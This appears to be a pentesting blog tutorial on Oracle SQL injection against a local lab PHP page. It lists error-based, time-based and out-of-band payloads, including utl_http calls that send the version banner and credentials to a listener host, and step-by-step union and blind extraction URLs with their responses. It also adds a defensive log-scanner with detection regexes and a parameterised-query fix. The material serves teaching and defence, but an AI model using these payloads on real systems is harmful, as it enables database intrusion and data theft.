Date: May 25, 2023
Category: Penetration testing
Contents
  Common functions: LENGTH(), SUBSTR(), SUBSTR() time-based injection, utl_inaddr.get_host_name() error-based injection, utl_http.request out-of-band injection
  Boolean blind injection [and / or]: 1. test whether the condition holds; 2. get the length [length()]; 3. get the database name [substr] and [substr && ascii]; 4. get the table names; 5. time-based injection
  Union injection [union]: 1. find the column count [order by]; 2. connected user name [user]; 3. database user [sys_context]; 4. database version; 5. databases; 6. table names; 7. column names; 8. row data
Common functions

LENGTH(): length of a string
# When both sides of AND are equal the condition holds, so the length is known; e.g. when the left side is 15, the length (here of the first table name) is 15
1 and 15=(SELECT LENGTH(table_name) from user_tables where rownum=1)

SUBSTR(): extract one character and compare it by ASCII code
68=((select ascii(substr(table_name,1,1)) from user_tables WHERE rownum=1))

SUBSTR() time-based injection
1=(select decode(substr(user,1,1),'T',dbms_pipe.receive_message('RDS',5),0) from dual)
# Same probe with a different pipe name; the response is delayed 5 seconds only when the guessed character matches
1=(select decode(substr(user,1,1),'T',dbms_pipe.receive_message('o',5),0) from dual)

utl_inaddr.get_host_name() error-based injection
utl_inaddr.get_host_name(): 1=utl_inaddr.get_host_name((select user from dual))
ctxsys.drithsx.sn(): 1=ctxsys.drithsx.sn(1,(select user from dual))
XMLType(): (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
dbms_xdb_version.checkin(): and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
dbms_xdb_version.makeversioned(): and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
dbms_xdb_version.uncheckout(): and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
dbms_utility.sqlid_to_sqlhash(): and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --
ordsys.ord_dicom.getmappingxpath(): and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--
decode(): and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --

utl_http.request out-of-band injection
utl_http.request('http://192.168.1.2:6666/'%7c%7c(select banner from sys.v_$version where rownum=1))=1
utl_http.request('http://192.168.1.2:6666/'%7c%7c(SELECT CONCAT("name","password") FROM STU where rownum=1))=1
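From the defender's side, every primitive listed above (boolean logic, substr/ascii probing, order by, union ... from dual, dbms_pipe, utl_inaddr, utl_http and the error-based packages) leaves a recognisable fragment in the request line. The following added example, which is not code from the original post, decodes Apache-style access-log lines and tags each request with the Oracle injection signatures it matches. The log lines are constructed for this example and modelled on the payloads in this post; the signature names and the common log format are this example's own assumptions.

```python
"""Flag Oracle SQL-injection probes in web access-log lines.

Added example, not from the original post. Signatures are the Oracle
functions and SQL fragments the post lists; the sample log is constructed.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log (Apache common log format assumed):
# one benign request, then probes modelled on the post's payloads.
SAMPLE_LOG = r"""
127.0.0.1 - - [25/May/2023:10:00:01 +0800] "GET /oracle_inject/oracle.php?id=1 HTTP/1.1" 200 52
127.0.0.1 - - [25/May/2023:10:00:02 +0800] "GET /oracle_inject/oracle.php?id=1%20and%201=2 HTTP/1.1" 200 0
127.0.0.1 - - [25/May/2023:10:00:03 +0800] "GET /oracle_inject/oracle.php?id=1%20and%20(ascii(substr((select%20user%20from%20dual),1,1)))=83 HTTP/1.1" 200 52
127.0.0.1 - - [25/May/2023:10:00:04 +0800] "GET /oracle_inject/oracle.php?id=1%20order%20by%2010--+ HTTP/1.1" 200 310
127.0.0.1 - - [25/May/2023:10:00:05 +0800] "GET /oracle_inject/oracle.php?id=1%20and%201=2%20union%20select%20null,user,null,null%20from%20dual-- HTTP/1.1" 200 70
127.0.0.1 - - [25/May/2023:10:00:06 +0800] "GET /oracle_inject/oracle.php?id=1%20and%201=utl_inaddr.get_host_name((select%20user%20from%20dual)) HTTP/1.1" 500 0
127.0.0.1 - - [25/May/2023:10:00:07 +0800] "GET /oracle_inject/oracle.php?id=1%20and%201=(select%20decode(substr(user,1,1),'T',dbms_pipe.receive_message('RDS',5),0)%20from%20dual) HTTP/1.1" 200 52
"""

# Signature names are this example's own labels; patterns come from the post's payloads.
SIGNATURES = {
    "boolean-logic":  re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "blind-substr":   re.compile(r"\b(ascii|substrc?)\s*\(", re.I),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "oracle-dual":    re.compile(r"\bfrom\s+dual\b", re.I),
    "error-based":    re.compile(
        r"\b(utl_inaddr\.get_host_name|ctxsys\.drithsx\.sn|dbms_xdb_version\.\w+"
        r"|dbms_utility\.sqlid_to_sqlhash|ordsys\.ord_dicom\.getmappingxpath|xmltype)\s*\(", re.I),
    "time-based":     re.compile(r"dbms_pipe\.receive_message\s*\(", re.I),
    "out-of-band":    re.compile(r"utl_http\.request\s*\(", re.I),
}

# Apache common log format: client, identity, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')


def scan_request(path):
    """Return the sorted list of signature names matched by a URL-decoded request path."""
    decoded = unquote_plus(path)  # %20 and '+' become spaces, so keyword regexes work
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(text):
    """Parse log lines and return one finding per request that matches any signature."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than fail the whole scan
        hits = scan_request(m["path"])
        if hits:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "hits": hits, "request": unquote_plus(m["path"]),
            })
    return findings


def probes_per_source(findings):
    """Count flagged requests per client IP; a blind extraction shows up as a long burst."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["ts"], f["ip"], f["status"], ",".join(f["hits"]), f["request"])
    print("flagged per source:", probes_per_source(results))
```

The per-source count matters more than any single hit: the character-by-character probes in sections 2 to 4 of this post each look harmless in isolation, but hundreds of near-identical requests from one client that differ only in the substr position and compared value are the signal to alert on.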

Boolean blind injection [and / or]

1. Does the condition hold? This tests whether an injection point exists.
When the condition holds, the data is returned:
http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=1
Id:1 Name:admin Age:11
When the condition does not hold, the response is empty (or returns less data):
http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2

2. Get the length [length()]
With "<24" the data is returned, while with "<23" the response is empty, so the total number of databases (distinct owners) is 23.

Read the total number of databases: 23
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (select count(distinct(owner)) from sys.all_tables)<24
Response: Id:1 Name:admin Age:11
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (select count(distinct(owner)) from sys.all_tables)<23
Response: (empty)

Get the length of the current database name: 6
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (length((select nvl(cast(user as varchar(4000)),chr(32)) from dual)))=6
Response: Id:1 Name:admin Age:11
3.1 Get the database name [substr]

Read character 1 of the current database name: S
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1))='S'
Response: Id:1 Name:admin Age:11

Read character 2 of the current database name: Y
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),2,1))='Y'
Response: Id:1 Name:admin Age:11

(continue position by position)
Current database name read out: SYSTEM

3.2 Get the database name [substr && ascii]

Read character 1 of the current database name: S
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)))=83
Response: Id:1 Name:admin Age:11

Read character 2 of the current database name: Y
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),2,1)))=89
Response: Id:1 Name:admin Age:11

Read character 3 of the current database name: S
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),3,1)))=83
Response: Id:1 Name:admin Age:11

(continue position by position)


4. Get the table names

4.1.1 Count the tables directly:
Method 1:
Count directly: 157
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner='SYSTEM')=157
Response: Id:1 Name:admin Age:11

4.1.2 Use SUBSTR() to guess digits 1, 2 and 3 of the count (the owner 'SYSTEM' is spelled with chr() here):
Digit 1: 1
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),1,1))=1
Response: Id:1 Name:admin Age:11
Digit 2: 5
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),2,1))=5
Response: Id:1 Name:admin Age:11
Digit 3: 7
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),3,1))=7
Response: Id:1 Name:admin Age:11

4.1.3 Use ASCII() and SUBSTR() to guess the ASCII code of digits 1, 2 and 3:
Decimal 49 = ASCII character '1'
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),1,1))=49)
Response: Id:1 Name:admin Age:11
Decimal 53 = ASCII character '5'
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),2,1))=53)
Response: Id:1 Name:admin Age:11
Decimal 55 = ASCII character '7'
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),3,1))=55)
Response: Id:1 Name:admin Age:11

5. Time-based injection
Union injection [union]

1. Find the column count [order by]
# When the number is <= the number of selectable columns, the data is returned normally
http://172.20.176.1/oracle_inject/oracle.php?id=1 order by 4--+
Id:1 Name:admin Age:11
# When the number is > the number of selectable columns, no data is returned (an error message is the usual response)
http://172.20.176.1/oracle_inject/oracle.php?id=1 order by 10--+
Warning: oci_execute(): ORA-01785: ORDER BY item must be the number of a SELECT-list expression in E:\4-phpEnvironment\PhpStudy\PHPTutorial\WWW\Oracle_inject\oracle.php on line 19 Warning: oci_fetch_row(): ORA-24374: define not done before fetch or execute and fetch in E:\4-phpEnvironment\PhpStudy\PHPTutorial\WWW\Oracle_inject\oracle.php on line 20
Current order by column count: 4.
2. Query the connected user name with union [user]
Query the user name
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 union select null,user,null,null from dual--
Response: Id:1 Name:admin Age:11
          Id: Name:SYSTEM Age:
Current connection user: SYSTEM

3. Query the database user [sys_context]
Query the database user
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 union select null,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),null,null from dual--
Response: Id:1 Name:admin Age:11
          Id: Name:SYSTEM Age:
Current user: SYSTEM

4. Get the current database version
Query the version banner
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 union select null,(select banner from sys.v_$version where rownum=1),null,null from dual--
Response: Id:1 Name:admin Age:11
          Id: Name:Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production Age:
5. Query the databases
Note: when querying table names, always use upper case.
Query the total number of databases: 23
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,('~'||(select count(distinct(owner)) from sys.all_tables)||'~'),null,null from dual--
Response: Id: Name:~23~ Age:

Query the first database name: APEX_030200
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1)),null,null from dual--+
Response: Id: Name:APEX_030200 Age:

Query the second database name: APPQOSSYS
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=2)),null,null from dual--+
Response: Id: Name:APPQOSSYS Age:

6. Query the table names
Query the total number of tables: 10
Payload:  http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,('~'||(select count(1) from sys.all_tables where owner='OE')||'~'),null,null from dual--+
Response: Id: Name:~10~ Age:

Query the first table in the database: CUSTOMERS
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union select null, (select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='OE')) where limit=1), null, null from dual--+
Response: Id: Name:CUSTOMERS Age:

Query the second table in the database: INVENTORIES
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union select null, (select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='OE')) where limit=2), null, null from dual--+
Response: Id: Name:INVENTORIES Age:

Continuing in the same way (limit=3, 4, ...), all 10 table names can be enumerated.
7. Query the column names of a table
Query the total number of columns in the table: 15
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union all select null,('~'||(select count(1) from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')||'~'),null,null from dual--+
Response: Id: Name:~15~ Age:

Query the first column of the table: CUSTOMER_ID
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union all select null,(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')) where limit=1),null,null from dual--+
Response: Id: Name:CUSTOMER_ID Age:

Query the second column of the table: CUST_FIRST_NAME
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union all select null,(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')) where limit=2),null,null from dual--+
Response: Id: Name:CUST_FIRST_NAME Age:

8. Query the data in the columns
Columns queried: CUST_LAST_NAME, CUSTOMER_ID, ACCOUNT_MGR_ID
Query the total number of rows in the table: 319
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,('~'||(select count(1) from OE.CUSTOMERS)||'~'),null,null from dual--+
Response: Id: Name:~319~ Age:

Query the first row of the CUSTOMERS table in the OE database:
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,(select '~'||CUST_LAST_NAME||'~'||CUSTOMER_ID||'~'||ACCOUNT_MGR_ID||'~' from (select CUST_LAST_NAME,CUSTOMER_ID,ACCOUNT_MGR_ID,rownum as limit from OE.CUSTOMERS) where limit=1),null,null from dual--+
Response: Id: Name:~Kanth~240~145~ Age:

Query the second row of the CUSTOMERS table in the OE database:
Payload:  http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2 union select null,(select '~'||CUST_LAST_NAME||'~'||CUSTOMER_ID||'~'||ACCOUNT_MGR_ID||'~' from (select CUST_LAST_NAME,CUSTOMER_ID,ACCOUNT_MGR_ID,rownum as limit from OE.CUSTOMERS) where limit=2),null,null from dual--+
Response: Id: Name:~Broderick~241~145~ Age:
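Every probe in this post, from the `and 1=1` / `and 1=2` pair through `order by N` to `union select ... from dual`, works only because the `id` parameter is pasted into the SQL text of the PHP page's statement. The following added example (not code from the original post, which targets PHP + OCI8 on Oracle) reproduces that defect with Python's sqlite3 as an offline stand-in and puts the validated, bound version beside it. The table `stu`, its rows, and the names `lookup_vulnerable`, `lookup_safe`, `probe` and `safe_outcome` are this example's own; SQLite has no DUAL table, so the union probe is written without `from dual`.

```python
"""Concatenated vs bound query: why the post's id= probes work, and the fix.

Added example, not from the original post. sqlite3 stands in for Oracle so it
runs offline; the dialect differs, the concatenation defect is the same.
"""
import sqlite3


def make_db():
    """Constructed in-memory table mirroring the post's 'Id:1 Name:admin Age:11' row (4 columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stu (id INTEGER, name TEXT, age INTEGER, note TEXT)")
    conn.executemany("INSERT INTO stu VALUES (?,?,?,?)",
                     [(1, "admin", 11, "x"), (2, "guest", 20, "y")])
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by string concatenation, the pattern behind the post's oracle.php."""
    sql = "SELECT id, name, age, note FROM stu WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: reject anything that is not an integer, then pass it as a bind variable."""
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    # The value travels separately from the SQL text, so it can never change the statement.
    return conn.execute("SELECT id, name, age, note FROM stu WHERE id=?", (id_int,)).fetchall()


def probe(conn, user_id):
    """What an attacker observes from the vulnerable page: a row count, or 'error'."""
    try:
        return len(lookup_vulnerable(conn, user_id))
    except sqlite3.Error:
        return "error"


def safe_outcome(conn, user_id):
    """Same observation against the hardened lookup: a row count, or 'rejected'."""
    try:
        return len(lookup_safe(conn, user_id))
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs that mirror the post's boolean, order-by and union probes.
    for value in ["1", "1 and 1=1", "1 and 1=2", "1 order by 4", "1 order by 10",
                  "1 and 1=2 union select null,'SYSTEM',null,null"]:
        print(f"{value!r:55} vulnerable={probe(db, value)!s:6} safe={safe_outcome(db, value)}")
```

The vulnerable lookup gives the attacker exactly the three signals the post relies on: a row for `and 1=1` and none for `and 1=2` (the boolean oracle), an error once `order by` exceeds the column count, and a foreign row when a matching `union select` is appended. The bound lookup returns the same single row for a genuine id and rejects every other input before it reaches the database. In the post's PHP + OCI8 setup the equivalent fix is to parse the statement with a `:id` placeholder and attach the integer with `oci_bind_by_name`.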
- Author: 轻言易梦
- Link: https://hexo.xslover.xyz/article/0afb0101-6c28-4f2c-b725-dea1918d9f2f
- Notice: This article is released under the CC BY-NC-SA 4.0 license; please credit the source when reposting.